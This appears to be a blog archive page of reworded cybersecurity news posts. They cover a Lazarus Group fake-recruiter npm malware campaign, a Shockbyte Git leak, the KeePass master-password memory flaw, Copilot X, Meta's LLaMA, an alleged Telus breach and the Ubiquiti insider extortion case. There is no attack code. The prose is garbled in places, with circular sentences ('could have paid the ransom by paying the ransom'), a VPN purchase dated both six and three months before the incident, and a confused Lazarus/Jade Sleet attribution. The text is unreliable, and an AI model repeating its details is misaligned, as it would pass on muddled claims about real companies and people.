Attack Process by the Lazarus Group


To begin with, the threat actor claims to be a developer or recruiter. He poses as them on GitHub and other social media websites related to the developer or recruiter niche. For contacting victims, they use their accounts as well as compromised accounts by Jade Sleet exploited by the group. 

There may be instances when the actor initiates contact on one platform and switches to another platform after a few minutes. When a threat actor connects with a victim he or she invites the victim to collaborate on a GitHub repository and uses the target as a means of cloning and executing the contents of the repository. The attacker may send the malicious software directly through a messaging service or file-sharing service, without inviting people to the repository and cloning it, in some cases. 

A malicious npm dependency has been included in the GitHub repository for the software. In addition to media players, the threat actor uses tools for selling cryptocurrencies in some of the software he builds. In addition to the malicious npm packages, these malicious npm packages also download secondary malware onto the victim's machine. A malicious package will normally not be published until a fake repository invitation is sent to you by an unknown threat actor.  

IOC details have been shared on the GitHub blog along with the suspension of npm and GitHub accounts associated with the campaign. As a practice, the most effective method of avoiding this campaign is to be cautious of social media solicitations for collaboration on or the installation of software that relies on NPM packages or dependencies. 

Lazarus Attacks in The Past 


Cryptocurrency companies and developers have been the target of North Korean hackers for a long time to steal assets needed to fund their country's initiatives. To steal cryptocurrency wallets and funds, Lazarus spreads Trojanized cryptocurrency wallets and exchange apps to target cryptocurrency users. 

It has been revealed that the U.S. Secret Service and the FBI have linked the Lazarus group to the theft of USDC and Ethereum tokens worth over $617 million from the blockchain-based game Axie Infinity by members of the Lazarus group. A malicious laced PDF file was later revealed to have been sent to one of the blockchain engineers by the threat actors, claiming to be a lucrative job offer disguised as a malicious PDF file. In this case, the attack was a result of this. 

Additionally, in 2020, a campaign called "Operation Dream Job" was used to deliver malware to employees at prominent aerospace and defense companies in the US through fake employment opportunities used to spread malware to them.
Read more »
Yahoo
Cyber Security Cybersecurity. GitHub Minecraft Password Sensitive Data Leak servers Yahoo

Shockbyte Assures Users of Data Safety Amid Git Leak Incident

 

Minecraft enthusiasts were taken aback by recent reports of a security breach at Shockbyte, one of the leading Minecraft server hosting providers. However, the company has come forward to assure its users that there is no cause for concern regarding their data. The incident, which involved a leak of data through Git, raised eyebrows among the Minecraft community, but Shockbyte quickly took action to address the issue.

The news of the security incident spread rapidly across various tech publications, causing a wave of worry among Shockbyte's user base. TechRadar, CyberNews, and Yahoo! were among the platforms that covered the story, amplifying concerns about potential data compromise. However, it is essential to clarify the company's response and the actions taken to ensure data safety.

Shockbyte promptly acknowledged the situation and undertook a thorough investigation into the incident. The hosting provider determined that the breach occurred through a leak in their Git repository, a widely used version control system. Although Git leaks can be serious, Shockbyte acted swiftly to minimize any potential impact on its users.

In a public statement, Shockbyte reassured its customers that no sensitive personal data, including passwords or payment information, had been compromised. The leaked data primarily consisted of code and configuration files related to server setups. While this incident is undoubtedly concerning, it is important to note that the leaked information does not pose a direct threat to users' personal data or accounts.

The company has taken immediate steps to address the issue and mitigate any potential risks. Shockbyte has thoroughly reviewed its security measures and implemented additional safeguards to prevent similar incidents from occurring in the future. They have also emphasized the importance of strong passwords and recommended that users change their login credentials as an extra precaution.

Furthermore, Shockbyte has been transparent in its communication with its users throughout the incident. They have actively updated their customers via their official website and social media channels, providing detailed information about the breach and the steps taken to resolve it. By maintaining open lines of communication, Shockbyte has demonstrated its commitment to ensuring the trust and confidence of its user community.

As Minecraft continues to captivate millions of players worldwide, the importance of robust server hosting and data security cannot be overstated. Shockbyte's response to the Git leak incident serves as a reminder of the need for constant vigilance in safeguarding user data. The incident has undoubtedly been a learning experience for the company, further strengthening its commitment to data protection and cybersecurity.
Read more »
Vulnerabilities and Exploits
Bleeping Computer GitHub KeePass password exploit Password Manager Vulnerabilities and Exploits

KeePass Vulnerability: Hackers May Have Stolen the Master Passwords


One would expect an ideal password manager to at least keep their users’ passwords safe and secure. On the contrary, a new major vulnerability turned out to be putting the KeePass password manager users at serious risk of their passwords being breached.

Apparently, the vulnerability enables an attacker to extract the master password from the target computer's memory and take it away in plain text, or in other words, in an unencrypted form. Although it is a fairly easy hack, there are expected to be some unsettling repercussions.

Password managers, like in this case KeePass, lock up a user’s login info encrypted and secure behind a master password in order to keep it safe. The vault is a valuable target for hackers since the user is required to input the master password to access everything within.

How is KeePass Vulnerability a Problem? 

Security researcher 'vdohney,' according to a report by Bleeping Computer, found the KeePass vulnerability and posted a proof-of-concept (PoC) program on GitHub.

With the exception of the initial one or two characters, this tool can almost entirely extract the master password in readable, unencrypted form. Even if KeePass is locked and, possibly, if the app is completely closed, it is still capable of doing this.

All this is because the vulnerability extracts the master password from KeePass’s memory. This can be acquired, as the researcher says, in a number of ways: “It doesn’t matter where the memory comes from — can be the process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys) or RAM dump of the entire system.”

The exploit is only possible due to some custom code KeePass uses. Your master password is entered in a unique box named SecureTextBoxEx. Despite its name, it turns out that this box is actually not all that secure since each character that is entered essentially creates a duplicate of itself in the system memory. The PoC tool locates and extracts these remaining characters.

‘A Fix is Incoming’ 

Having physical access to the computer from which the master password is to be taken is the only drawback to this security breach. However, that is not always a problem; as the LastPass vulnerability case demonstrated, hackers can access a target's computer by utilizing weak remote access software installed on the device.

In case a device was infected by a malware, it may as well be set up to dump KeePass's memory and send it and the app's database back to the hacker's server, giving the threat actor time to get the master password.

Fortunately, the developer of KeePass promises that a fix is incoming; one of the potential fixes is to add random dummy text that would obscure the password into the app's memory. It may be agonizing to wait until June or July 2023 for the update to be made available for anyone concerned about their master password being compromised. The fix, however, is also available in beta form and may be downloaded from the KeePass website.    

Read more »
Technology
AI AI Model Artificial Intelligence ChatGPT GitHub Software Technology

GitHub Introduces the AI-powered Copilot X, which Uses OpenAI's GPT-4 Model

 

The open-source developer platform GitHub, which is owned by Microsoft, has revealed the debut of Copilot X, the company's perception of the future of AI-powered software development.

GitHub has adopted OpenAI's new GPT-4 model and added chat and voice support for Copilot, bringing Copilot to pull requests, the command line, and documentation to answer questions about developers' projects.

'From reading docs to writing code to submitting pull requests and beyond, we're working to personalize GitHub Copilot for every team, project, and repository it's used in, creating a radically improved software development lifecycle,' Thomas Dohmke, CEO at GitHub, said in a statement.

'At the same time, we will continue to innovate and update the heart of GitHub Copilot -- the AI pair programmer that started it all,' he added.

Copilot chat recognizes what code a developer has entered and what error messages are displayed, and it is deeply integrated into the IDE (Integrated Development Environment).

As stated by the company, Copilot chat will join GitHub's previously demoed voice-to-code AI technology extension, which it is now calling 'Copilot voice,' where developers can verbally give natural language prompts. Furthermore, developers can now sign up for a technical preview of the first AI-generated pull request descriptions on GitHub.

This new feature is powered by OpenAI's new GPT-4 model and adds support for AI-powered tags in pull request descriptions via a GitHub app that organization admins and individual repository owners can install.

As per the company, GitHub is also going to launch Copilot for docs, an experimental tool that uses a chat interface to provide users with AI-generated responses to documentation questions, including questions about the languages, frameworks, and technologies they are using.
Read more »
Technology
Artificial Intelligence ChatGPT GitHub Large Language Model LLaMA LLM Meta OpenAI Technology

Meta Announces a New AI-powered Large Language Model


On Friday, Meta introduced its new AI-powered large language model (LLM) named LLaMA-13B that, in spite of being "10x smaller," can outperform OpenAI's GPT-3 model. Language assistants in the ChatGPT style could be run locally on devices like computers and smartphones, thanks to smaller AI models. It is a part of the brand-new group of language models known as "Large Language Model Meta AI," or LLAMA. 

The size of the language models in the LLaMA collection ranges from 7 billion to 65 billion parameters. In contrast, the GPT-3 model from OpenAI, which served as the basis for ChatGPT, has 175 billion parameters. 

Meta can potentially release its LLaMA model and its weights available as open source, since it has trained models through the openly available datasets like Common Crawl, Wkipedia, and C4. Thus, marking a breakthrough in a field where Big Tech competitors in the AI race have traditionally kept their most potent AI technology to themselves.   

In regards to the same, Project member Guillaume’s tweet read "Unlike Chinchilla, PaLM, or GPT-3, we only use datasets publicly available, making our work compatible with open-sourcing and reproducible, while most existing models rely on data which is either not publicly available or undocumented." 

Meta refers to its LLaMA models as "foundational models," which indicates that the company intends for the models to serve as the basis for future, more sophisticated AI models built off the technology, the same way OpenAI constructed ChatGPT on the base of GPT-3. The company anticipates using LLaMA to further applications like "question answering, natural language understanding or reading comprehension, understanding capabilities and limitations of present language models" and to aid in natural language research. 

While the top-of-the-line LLaMA model (LLaMA-65B, with 65 billion parameters) competes head-to-head with comparable products from rival AI labs DeepMind, Google, and OpenAI, arguably the most intriguing development comes from the LLaMA-13B model, which, as previously mentioned, can reportedly outperform GPT-3 while running on a single GPU when measured across eight common "common sense reasoning" benchmarks like BoolQ, PIQA LLaMA-13B opens the door for ChatGPT-like performance on consumer-level hardware in the near future, unlike the data center requirements for GPT-3 derivatives. 

In AI, parameter size is significant. A parameter is a variable that a machine-learning model employs in order to generate hypotheses or categorize data as input. The size of a language model's parameter set significantly affects how well it performs, with larger models typically able to handle more challenging tasks and generate output that is more coherent. However, more parameters take up more room and use more computing resources to function. A model is significantly more efficient if it can provide the same outcomes as another model with fewer parameters. 

"I'm now thinking that we will be running language models with a sizable portion of the capabilities of ChatGPT on our own (top of the range) mobile phones and laptops within a year or two," according to Simon Willison, an independent AI researcher in an Mastodon thread analyzing and monitoring the impact of Meta’s new AI models. 

Currently, a simplified version of LLaMA is being made available on GitHub. The whole code and weights (the "learned" training data in a neural network) can be obtained by filling out a form provided by Meta. A wider release of the model and weights has not yet been announced by Meta.  

Read more »
User Privacy
API Bug Canada Cyber Security Databases GitHub Malicious actor SIM Telecom Firm User Privacy

Canadian Telecom Provider Telus is Reportedly Breached

 

One of Canada's biggest telecommunications companies, Telus, is allegedly investigating a system breach believed to be fairly severe when malicious actors exposed samples of what they claimed to be private corporate information online.

As per sources, the malicious actors posted on BreachForums with the intention of selling an email database that claimed to include the email addresses of every Telus employee. The database has a $7000 price tag. For $6,000, one could access another database purported to provide payroll details for the telecom companies' top executives, including the president.

A data bundle with more than 1,000 private GitHub repositories allegedly belonging to Telus was also offered for sale by the threat actor for $50,000. A SIM-swapping API was reportedly included in the source code that was for sale. SIM-swapping is the practice of hijacking another person's phone by switching the number to one's own SIM card.

Although the malicious actors have described this as a Complete breach and have threatened to sell everything connected to Telus, it is still too early to say whether an event actually happened at TELUS or whether a breach at a third-party vendor actually occurred.

A TELUS representative told BleepingComputer that the company is looking into accusations that some information about selected TELUS team members and internal source code has leaked on the dark web.

The Telus breach would be the most current in recent attacks on telecom companies if it occurred as the malicious actors claimed. Three of the biggest telecommunications companies in Australia, Optus, Telestra, and Dialog, have all been infiltrated by attackers since the beginning of the year.

Customer data was used in a cyberattack that affected the Medisys Health Group business of Telus in 2020. The company claimed at the time that it paid for the data and then securely retrieved it. Although TELUS is still keeping an eye on the potential incident, it has not yet discovered any proof that corporate or retail customer data has been stolen.



Read more »
UWS
Cyber Frauds Cyberattacks Cybersecurity GitHub Hackers Uniquiti UWS

Extortion Attempt by Former Ubiquiti Developer

 


Former Ubiquiti employee Nickolas Sharp admitted to the company that he stole gigabytes of private data from the company's network while he was overseeing the company's cloud technology team. During this period, he misrepresented himself as an anonymous hacker and whistleblower to avoid detection. Ubiquiti's GitHub repositories and AWS servers were breached in December 2020 by Sharp, a 36-year-old software engineer from Portland, Oregon. 

Sharp agreed that he would plead guilty to three charges, including making false statements to the FBI, wire fraud, and sending a malicious computer program to a protected computer. Those who commit either of these offenses will be punished with a maximum sentence of 35 years in prison as punishment. 

As a consequence of the data theft incident reported by Ubiquiti in January 2021, the company reported a security incident. 

Using the cover of being an anonymous hacker and pretending to target the company, Sharp tried to extort them. There were 50 bitcoins demanded in the ransom note, which was approximately equal to about $1.9 million at the time the note was written. It was a condition of the agreement to recover the data in exchange for disclosing the weakness in the network that allowed the hack to take place. While Ubiquiti could have paid the ransom by paying the ransom, it chose to change every employee's login information rather than pay the ransom. A second security breach was also discovered in the business's systems, which was found and eliminated before the business notified the government of the breach on December 11. 

A single hour after Sharp was identified as the hacker behind the attack, Ubiquiti's UWS infrastructure and GitHub repositories were cloned using his cloud administrator credentials via SSH (on December 10, 2020) and private files were stolen (on December 21 and 22). 

Despite using the Surfshark VPN service to conceal his IP address while collecting data, he could determine the data collector's location. This was after a short outage of the Internet caused his location to be discovered. He also changed the Log Retention Rules on Ubiquiti's servers along with other data that would have revealed his identity during the investigation. This was done to conceal his identity. 

As a result of a search by the FBI, Nicholas Sharp's residence was searched on March 24, 2021, and electronic equipment belonging to him was seized. He gave several false statements to FBI officials when he was being interrogated. 

His explanations included that he was not the one who committed the crime and that he had never previously used a VPN service of this type. As per records, Sharp purchased the Surfshark VPN service about six months before the incident occurred, in July 2020. It was obtained three months beforehand. Because of this fraud, he alleged that another party had accessed his PayPal account to complete this transaction, so he made the fraudulent allegation that they did so. 

In a media interview after the extortion attempt failed, Sharp, in the false identity of a whistleblower, alleged that Ubiquiti downplayed the breach to avoid retribution. It was after he challenged Ubiquiti's assertion about the impact of the January hack that the company acknowledged its involvement in an extortion attempt and said that there was no indication that any of its users' accounts had been hacked that the firm acknowledged that it was the target of an extortion attempt following that incident. 

He also claimed that Ubiquiti did not have a logging mechanism to enable them to determine whether or not the "attacker" had accessed any systems or data, and that would have prevented them from determining what had occurred. Despite his assertions, the information provided by the Justice Department indicates that he altered the company's logs and the system was compromised.  
Read more »
Subscribe to: Posts (Atom)